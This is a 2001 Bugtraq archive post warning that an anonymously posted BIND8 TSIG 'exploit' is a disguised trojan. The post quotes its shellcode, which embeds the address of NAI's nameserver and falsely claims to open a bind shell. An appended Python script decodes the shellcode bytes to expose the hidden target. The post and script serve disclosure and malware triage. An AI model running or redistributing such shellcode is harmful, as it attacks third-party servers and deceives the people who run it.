Bugtraq mailing list archives
That BIND8 "exploit" attacks NAI
From: Max Vision <vision () WHITEHATS COM>
Date: Wed, 31 Jan 2001 20:57:54 -0800
Hi,

Please beware of running code such as this. It will do its best to attack NAI's nameserver. It's a typical, though well disguised, shellcode trick. Look in the Linux shellcode:

\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com

More details after I have a better look...

Max

At 04:12 PM 1/31/2001 -0700, you wrote:
>From Anonymous <nobody () replay com> Wed Jan 31 18:06:24 2001
Date: Thu, 31 Jan 2001 18:06:19 -0400
From: Anonymous <nobody () replay com>
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Bind8 exploit
Message-ID: <C5119AD12E92D311928E009027DE4CCA554903 () replay com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Mailer: Internet Mail Service (5.5.2650.21)

/*
 * Implements TSIG buffer mismanagement overflow for incorrect signatures. That
 * one was really nice bug!
 * Thanks NAI for nice bug!
 */

/* zeroes in all shellcodes are allowed - we encode them anyway.. */

char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
                          * bind to tcp port 31338. hey aleph1
                          * :) */
"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
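Added example, not part of either message above: a Python triage script for the check Max describes, decoding C string literals from a posted array and scanning the bytes for an embedded `sockaddr_in`, so the address and port can be read without running anything. The function names are this example's own, and reading the three integers before the hit as `socket()` arguments is its interpretation.

```python
import re
import socket
import struct

AF_INET = 2  # Linux value; x86 stores sin_family little-endian

# Excerpt copied from the fourth and fifth lines of the array quoted above.
SAMPLE = r'''
"\x02\x00\x00\x00\x02"
"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
'''

def decode_c_literals(src):
    """Join adjacent C string literals and decode \\xNN and octal escapes.
    Assumes two-digit hex escapes, as the posted array uses."""
    body = "".join(re.findall(r'"((?:[^"\\]|\\.)*)"', src))
    out = bytearray()
    for hx, octal, ch in re.findall(r'\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})|(.)', body, re.S):
        if hx:
            out.append(int(hx, 16))
        elif octal:
            out.append(int(octal, 8) & 0xFF)
        else:
            out.append(ord(ch) & 0xFF)
    return bytes(out)

def find_sockaddr_in(blob):
    """Return (offset, ip, port) for each 8-byte window that parses as a
    plausible sockaddr_in: family AF_INET, non-zero port, routable-looking IP."""
    hits = []
    for off in range(len(blob) - 7):
        family = struct.unpack_from("<H", blob, off)[0]
        port = struct.unpack_from(">H", blob, off + 2)[0]  # network byte order
        addr = blob[off + 4:off + 8]
        if family == AF_INET and port != 0 and addr[0] not in (0, 255):
            hits.append((off, socket.inet_ntoa(addr), port))
    return hits

def port_present(blob, port):
    """True if the 16-bit port value occurs in either byte order."""
    return struct.pack(">H", port) in blob or struct.pack("<H", port) in blob

if __name__ == "__main__":
    blob = decode_c_literals(SAMPLE)
    for off, ip, port in find_sockaddr_in(blob):
        print(f"offset {off}: {ip} port {port}")
        if off >= 12:  # assumption: three ints before it are socket() args
            # On Linux, 2, 2, 17 are AF_INET, SOCK_DGRAM, IPPROTO_UDP.
            print("ints before it:", struct.unpack_from("<3I", blob, off - 12))
    print("claimed port 31338 present:", port_present(blob, 31338))
```

Paste the whole array into `SAMPLE` to compare the port claimed in the header comment against the constants that are actually embedded.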